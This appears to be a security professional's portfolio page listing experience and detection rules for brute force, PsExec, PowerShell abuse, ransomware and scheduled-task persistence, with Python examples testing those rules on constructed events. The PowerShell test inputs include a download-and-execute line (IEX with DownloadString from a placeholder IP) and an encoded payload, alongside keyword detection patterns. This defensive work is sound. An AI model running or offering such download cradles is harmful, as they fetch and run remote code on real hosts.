Penetration Tester
& SOC Analyst
Dual offensive/defensive background — web app pentesting, bug bounty on HackerOne & Bugcrowd, plus 500+ endpoint SIEM engineering at PostEx.
// about.me
Offensive Mindset,
Defensive Depth
Cybersecurity professional with 3+ years of experience and a dual offensive/defensive background, now focused on web application penetration testing and bug bounty research.
Proficient in full-cycle web app pentesting — recon through exploitation and reporting — applying OWASP Top 10 methodology, Burp Suite Pro, and manual exploitation across XSS, SQLi, IDOR, authentication flaws, and business logic vulnerabilities. Actively hunting on HackerOne and Bugcrowd.
Real-world detection engineering experience — authoring 40+ MITRE ATT&CK-mapped rules across a 500+ endpoint fintech environment — directly informs attacker thinking and exploit identification depth.
// work.history
Professional Experience
Cybersecurity Engineer & SOC Analyst
PostEx (Fintech)
- Engineered 40+ custom detection rules mapped to MITRE ATT&CK (T1059, T1486, T1078, T1053), developing attacker-pattern intuition applied directly to offensive research.
- Conduct proactive threat hunting across endpoint telemetry, surfacing lateral movement, persistence, and C2 patterns — skills transferable to purple/red team scenarios.
- Perform vulnerability assessments using OpenVAS and Nmap; lead CVE analysis, CVSS prioritization, and OS hardening per CIS Benchmark controls.
- Operate Elastic Defend EDR — monitor process injection, file activity, network behavior — building hands-on understanding of EDR detection logic exploited during offensive engagements.
- Reduced SIEM false positives by 40% through correlation tuning, threshold calibration, and log filtering.
- Designed n8n automation pipelines achieving sub-2-minute MTTN for P1/P2 alerts via Telegram and email.
Assistant Network Administrator
PostEx (Fintech)
- Managed firewall ACL rules, VLAN segmentation, and network topology for 500+ node environment — network knowledge directly supporting network-layer pentest reconnaissance.
- Configured MikroTik routers with OSPF/BGP routing and L2VPN tunnels; supported threat containment by isolating compromised segments during SOC-flagged incidents.
- Maintained change logs, device configurations, and network documentation supporting audit and compliance requirements.
Technical Support Engineer
StormFiber
- Diagnosed L1/L2/L3 network faults for enterprise customers; coordinated with NOC during outages following SLA escalation procedures.
// tech.stack
Tools & Technologies
Pentest Tools
Recon & OSINT
SIEM & Detection
Networking & Infra
Scripting & Frameworks
// projects
Featured Work
Bug Bounty & Web Application Security Research
Active hunting on HackerOne and Bugcrowd. Apply systematic OWASP Top 10 methodology across public programs. Identified and reported reflected/stored XSS, SQLi, IDOR, broken auth, and business logic flaws. Multi-phase recon: subdomain enum, JS file analysis, parameter discovery.
Web Application Penetration Testing Lab
Self-hosted lab (DVWA, Metasploitable, custom Docker targets) for full exploitation chain practice. Covers SQLi, XSS, file upload bypasses, SSRF, JWT cracking, deserialization, SSTI, and API exploitation.
Authentication & Session Attack Research
Deep-dive into broken auth chains: JWT alg:none, session fixation, OAuth misconfiguration, MFA bypass, and password reset host-header injection. PoC-driven with CVSS scoring.
MITRE ATT&CK Detection Rule Library
Developed 40+ detection rules across 15+ ATT&CK techniques (T1059, T1486, T1078, T1053, T1136, T1021) for ransomware, lateral movement, and persistence. Reverse-engineering rule logic informs evasion thinking for offensive engagements.
SOC Automation Pipeline (n8n)
Designed n8n automation achieving sub-2-minute MTTN for P1/P2 alerts. Auto-creates JIRA tickets, sends Telegram/email notifications, and isolates endpoints via Wazuh active response.
SIEM False Positive Reduction Program
Reduced Wazuh/Splunk false positives by 40% through correlation tuning, threshold calibration, and log filtering. Structured analytical methodology directly applicable to pentest triage.
Vulnerability Assessment & Hardening Program
Recurring OpenVAS and Nmap scanning across 500+ node infrastructure. Prioritized by CVSS and business impact. Applied CIS Benchmark hardening (Linux + Windows Server), eliminating high-severity misconfigs.
Zero-Trust Network Segmentation
VLAN-based micro-segmentation across 50+ segments using MikroTik and firewall ACL policy enforcement. OSPF/BGP routing with L2VPN tunnel management.
EDR Monitoring & Endpoint Hardening
Operate Elastic Defend EDR monitoring process injection, file activity, and network behavior. Hands-on understanding of EDR detection logic exploited during offensive engagements.
// detection.rules
Detection Research
Production-grade detection rules deployed across the PostEx security stack (ELK + Wazuh). Mapped to MITRE ATT&CK. Offensive value: reverse-engineering rule logic exposes detection gaps and informs evasion thinking for pentest engagements.
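Added worked example (not code from this page or from PostEx): the 5-minute bucketing and threshold logic of the Brute Force Detection SPL below, re-implemented in Python and run over constructed Event ID 4625 records. Field names follow the SPL (_time, dest_user, src_ip, EventCode), rows are keyed on the account only, and every event is invented. It also adds a companion check the SPL does not have: a per-source-IP count of distinct accounts, which is what catches a password spray that a per-account threshold never sees.

```python
"""
Bucketed brute-force detection (after the SPL rule) plus a spray variant.
All telemetry below is constructed for illustration.
"""
from collections import defaultdict
from datetime import datetime, timedelta, timezone

SPAN = timedelta(minutes=5)   # "| bucket span=5m _time"
THRESHOLD = 10                # "| where count > 10"


def risk_score(count: int) -> str:
    """Mirrors: eval risk_score=if(count>50,"CRITICAL", if(count>20,"HIGH","MEDIUM"))."""
    if count > 50:
        return "CRITICAL"
    if count > 20:
        return "HIGH"
    return "MEDIUM"


def bucket_start(ts: datetime, span: timedelta = SPAN) -> datetime:
    """Floor a timestamp to the start of its fixed span-wide bucket (what `bucket` does)."""
    epoch = int(ts.timestamp())
    width = int(span.total_seconds())
    return datetime.fromtimestamp(epoch - epoch % width, tz=timezone.utc)


def detect_bruteforce(events, threshold: int = THRESHOLD):
    """One row per (bucket, account) whose 4625 count exceeds the threshold,
    carrying the distinct source IPs, like the SPL's stats/where/table/sort."""
    ips_by_key = defaultdict(list)
    for ev in events:
        if ev.get("EventCode") != 4625:      # index=windows_security EventCode=4625
            continue
        ips_by_key[(bucket_start(ev["_time"]), ev["dest_user"])].append(ev["src_ip"])
    rows = []
    for (window, user), ips in ips_by_key.items():
        if len(ips) > threshold:
            rows.append({"_time": window, "dest_user": user, "count": len(ips),
                         "unique_ips": len(set(ips)), "src_ips": sorted(set(ips)),
                         "risk_score": risk_score(len(ips))})
    return sorted(rows, key=lambda r: r["count"], reverse=True)   # | sort - count


def detect_spray(events, threshold: int = THRESHOLD):
    """Companion check the SPL lacks: key on src_ip and count distinct accounts.
    A spray (one or two guesses per account across many accounts) never crosses
    a per-account threshold in the same window, but does cross this one."""
    users_by_key = defaultdict(set)
    for ev in events:
        if ev.get("EventCode") != 4625:
            continue
        users_by_key[(bucket_start(ev["_time"]), ev["src_ip"])].add(ev["dest_user"])
    return [{"_time": window, "src_ip": ip, "unique_users": len(users)}
            for (window, ip), users in users_by_key.items() if len(users) > threshold]


def sample_events():
    """Constructed telemetry: 30 failures against svc_backup from two IPs inside one
    5-minute bucket, then one failure each against 15 accounts from a single IP,
    plus a successful logon (4624) that the rule must ignore."""
    t0 = datetime(2024, 1, 1, 12, 0, tzinfo=timezone.utc)
    events = [{"EventCode": 4625, "_time": t0 + timedelta(seconds=5 * i),
               "dest_user": "svc_backup",
               "src_ip": "203.0.113.10" if i % 2 else "203.0.113.11"} for i in range(30)]
    events += [{"EventCode": 4625, "_time": t0 + timedelta(minutes=10, seconds=i),
                "dest_user": f"user{i:02d}", "src_ip": "198.51.100.7"} for i in range(15)]
    events.append({"EventCode": 4624, "_time": t0, "dest_user": "svc_backup",
                   "src_ip": "203.0.113.10"})
    return events


if __name__ == "__main__":
    for row in detect_bruteforce(sample_events()):
        print("bruteforce:", row)
    for row in detect_spray(sample_events()):
        print("spray:     ", row)
```

Against the constructed input the per-account rule fires once (svc_backup, 30 failures, two source IPs, HIGH) and stays silent on the 15-account spray, which only the per-source variant reports. Fixed buckets also mean a burst that straddles a 5-minute boundary is split in two; a sliding window avoids that at the cost of more state.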
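Added worked example (not code from this page or from PostEx): the pcre2 pattern of the Malicious PowerShell Execution rule below, run over constructed command lines to show what it catches, what it misses, and one way to close the gap. The command lines, the payload and the supplementary regex are my own illustration; only RULE_PATTERN is taken from the rule.

```python
"""
Exercising the PowerShell rule's regex against constructed command lines.
"""
import base64
import re

# The rule's pattern, verbatim; Python's re handles this PCRE2 subset identically.
RULE_PATTERN = re.compile(
    r"(?i)(EncodedCommand|bypass|hidden|downloadstring|iex|invoke-expression)")

# Gap: powershell.exe accepts any unambiguous prefix of a parameter name, so
# -e, -ec and -enc all mean -EncodedCommand and never contain the literal word.
# Instead of enumerating prefixes, flag a switch starting with "e" followed by a
# long base64-looking argument (>= 40 chars; shorter payloads slip under this).
ENCODED_ARG = re.compile(r"(?i)(?:^|\s)[-/]e\w*\s+[A-Za-z0-9+/]{40,}={0,2}(?=\s|$)")


def rule_matches(cmdline: str) -> bool:
    return RULE_PATTERN.search(cmdline) is not None


def supplemented_matches(cmdline: str) -> bool:
    return rule_matches(cmdline) or ENCODED_ARG.search(cmdline) is not None


def encode_command(script: str) -> str:
    """-EncodedCommand takes base64 of the UTF-16LE script, which is what gets shipped."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed test inputs. BLOB is 80 base64 characters with no padding.
BLOB = encode_command("IEX (New-Object Net.WebClient)")
SAMPLE_CMDLINES = {
    "encoded_full":   f"powershell.exe -NoP -EncodedCommand {BLOB}",
    "encoded_abbrev": f"powershell.exe -w h -enc {BLOB}",   # same payload, abbreviated switches
    "iex_download":   "powershell -c \"IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')\"",
    "benign_bypass":  r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\nightly-backup.ps1",
    "benign_plain":   r"powershell.exe -File C:\Scripts\Get-Inventory.ps1",
}


def evaluate(cmdlines=SAMPLE_CMDLINES):
    """Return {name: (rule_hit, supplemented_hit)} for each command line."""
    return {name: (rule_matches(c), supplemented_matches(c)) for name, c in cmdlines.items()}


if __name__ == "__main__":
    for name, (rule_hit, better_hit) in evaluate().items():
        print(f"{name:15} rule={rule_hit!s:5} supplemented={better_hit}")
```

Two things fall out: the abbreviated `-w h -enc` form carries the identical payload but produces no hit from the rule as written, and `-ExecutionPolicy Bypass` in a scheduled backup script trips the `bypass` keyword every night, which is the kind of noise the false-positive tuning on this page has to absorb. A keyword list is a starting point; the argument shape (a long base64 token after a short switch) is harder to dodge.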
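Added worked example (not code from this page or from PostEx): the frequency="3" timeframe="300" escalation of the Persistence via Scheduled Task rule below, re-implemented as a sliding-window correlator and replayed over constructed Security 4698 events. The XML below has no same_* option (such as same_location), so Wazuh would count 4698s from any agent together; this version counts per agent, the stricter variant. Check the Wazuh documentation for the exact off-by-one semantics of frequency before relying on the count; here the escalation fires on the third match inside the window.

```python
"""
Sliding-window correlation after rules 100401/100402. Events are constructed.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

WINDOW = timedelta(seconds=300)   # timeframe="300"
FREQUENCY = 3                     # frequency="3": escalate on the third match


def base_rule_matches(event: dict) -> bool:
    """Rule 100401: Security channel event whose eventID is exactly 4698 (^4698$)."""
    return event.get("channel") == "Security" and str(event.get("eventID")) == "4698"


def correlate(events, frequency: int = FREQUENCY, window: timedelta = WINDOW):
    """Replay events in time order and return one (timestamp, agent, task_names)
    tuple for each point at which `frequency` base-rule matches from the same
    agent fall within `window`, i.e. each time rule 100402 would fire."""
    recent = defaultdict(deque)   # agent -> (timestamp, task_name) of recent matches
    alerts = []
    for ev in sorted(events, key=lambda e: e["timestamp"]):
        if not base_rule_matches(ev):
            continue
        q = recent[ev["agent"]]
        q.append((ev["timestamp"], ev["task_name"]))
        while q and ev["timestamp"] - q[0][0] > window:   # expire matches outside the window
            q.popleft()
        if len(q) >= frequency:
            alerts.append((ev["timestamp"], ev["agent"], [name for _, name in q]))
            q.clear()   # one escalation per burst rather than one per extra event
    return alerts


def sample_events():
    """Constructed telemetry: three tasks created on WS01 within 90 s (should escalate),
    three on WS02 ten minutes apart (should not), and an unrelated 4688 on WS01."""
    t0 = datetime(2024, 1, 1, 9, 0, tzinfo=timezone.utc)
    events = []
    for i, name in enumerate(["\\Updater", "\\OneDrive Sync", "\\Health Check"]):
        events.append({"agent": "WS01", "channel": "Security", "eventID": 4698,
                       "task_name": name, "timestamp": t0 + timedelta(seconds=45 * i)})
    for i in range(3):
        events.append({"agent": "WS02", "channel": "Security", "eventID": 4698,
                       "task_name": f"\\Backup{i}", "timestamp": t0 + timedelta(minutes=10 * i)})
    events.append({"agent": "WS01", "channel": "Security", "eventID": 4688,
                   "task_name": None, "timestamp": t0 + timedelta(seconds=10)})
    return events


if __name__ == "__main__":
    for when, agent, tasks in correlate(sample_events()):
        print(f"{when.isoformat()} {agent}: repeated task creation {tasks}")
```

WS01's three creations inside 90 seconds produce one escalation carrying all three task names; WS02's three creations never coexist in a 300-second window, so the base rule fires three times at level 10 and the level-14 rule stays quiet. That is the distinction the frequency/timeframe pair buys you over a single-event rule.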
Brute Force Detection
T1110 · Brute Force

    index=windows_security EventCode=4625
    | bucket span=5m _time
    | stats count dc(src_ip) as unique_ips values(src_ip) as src_ips
        by _time dest_user Account_Name
    | where count > 10
    | eval risk_score=if(count>50,"CRITICAL", if(count>20,"HIGH","MEDIUM"))
    | table _time dest_user count unique_ips src_ips risk_score
    | sort - count

Lateral Movement via PsExec
T1021.002 · SMB/Windows Admin Shares

    title: Lateral Movement via PsExec
    id: d5866ddf-ce8f-4aea-b28e-d96485a20d3d
    status: stable   # Sigma accepts stable/test/experimental/deprecated/unsupported; "production" is not a valid value
    author: Asad Noor
    logsource:
        product: windows
        service: system
    detection:
        selection:
            Channel: System
            EventID: 7045            # a service was installed in the system
            ServiceName: 'PSEXESVC'  # PsExec -r renames the service, so this exact match can be sidestepped
        condition: selection
    falsepositives:
        - Legitimate admin usage
    level: high
    tags:
        - attack.t1021.002
        - attack.lateral_movement

Malicious PowerShell Execution
T1059.001 · PowerShell

    <group name="powershell,t1059,windows,">
      <rule id="100301" level="12">
        <if_group>windows_security</if_group>
        <!-- one pcre2 pattern on the process command line (shown broken across two lines on the page) -->
        <field name="win.eventdata.commandLine" type="pcre2">(?i)(EncodedCommand|bypass|hidden|downloadstring|iex|invoke-expression)</field>
        <description>T1059.001: Suspicious PowerShell execution</description>
        <mitre><id>T1059.001</id></mitre>
      </rule>
    </group>

Process Injection Hunt
T1055 · Process Injection

    // A shell started by a parent that rarely launches one, followed within 30 s by an
    // outbound connection from the same host to an address outside the listed private ranges.
    // Join on process.entity_id as well to tie the connection to the spawned shell;
    // explorer.exe -> cmd.exe is also an ordinary user action and needs tuning.
    sequence by host.name with maxspan=30s
      [process where event.type == "start"
        and process.name : ("cmd.exe", "powershell.exe")
        and process.parent.name : ("svchost.exe", "explorer.exe")]
      [network where destination.port in (443, 4444, 8080)
        // cidrMatch is EQL's CIDR test; `destination.ip : "10.0.0.0/8"` is a string
        // comparison and does not match a range. 192.168.0.0/16 and loopback are not excluded here.
        and not cidrMatch(destination.ip, "10.0.0.0/8", "172.16.0.0/12")]

Ransomware Behaviour Hunt
T1486 · Data Encrypted for Impact

    index=sysmon EventCode=11
        (file_name="*.encrypted" OR file_name="*.locked"
         OR file_name="READ_ME*" OR file_name="HOW_TO_DECRYPT*")
    | stats count dc(file_name) as unique_files values(file_name) as files by host
    | where unique_files > 20
    | eval severity="CRITICAL"
    | table host unique_files files severity
    | sort - unique_files

Persistence via Scheduled Task
T1053.005 · Scheduled Task

    <group name="persistence,t1053,windows,">
      <rule id="100401" level="10">
        <if_group>windows_security</if_group>
        <!-- Security 4698: a scheduled task was created -->
        <field name="win.system.eventID" type="pcre2">^4698$</field>
        <description>T1053.005: Scheduled task created - possible persistence</description>
        <mitre><id>T1053.005</id></mitre>
        <group>persistence,</group>
      </rule>
      <!-- escalate when 100401 has matched 3 times within 300 seconds -->
      <rule id="100402" level="14" frequency="3" timeframe="300">
        <if_matched_sid>100401</if_matched_sid>
        <description>Repeated scheduled task creation - high confidence T1053</description>
      </rule>
    </group>

// learning.certs
Certifications & Learning
Verified Certifications (In Progress / Planned marked separately)
PortSwigger Web Security Academy
Actively completing all lab modules
// contact